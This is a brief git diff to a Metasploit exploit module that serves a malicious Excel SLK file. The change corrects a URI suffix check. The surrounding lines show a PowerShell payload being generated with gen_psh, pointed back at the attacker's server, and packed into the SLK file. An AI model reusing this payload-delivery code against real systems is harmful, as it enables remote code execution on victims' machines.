diff --git a/modules/exploits/windows/fileformat/office_excel_slk.rb b/modules/exploits/windows/fileformat/office_excel_slk.rb index 4ca28bde95..50c3cc77d2 100644 --- a/modules/exploits/windows/fileformat/office_excel_slk.rb +++ b/modules/exploits/windows/fileformat/office_excel_slk.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote end def on_request_uri(cli, request) - if request.raw_uri.to_s.end_with? '.slk$' + if request.raw_uri.to_s.end_with? '.slk' print_status("Handling request for .slk from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = create_slk(payload)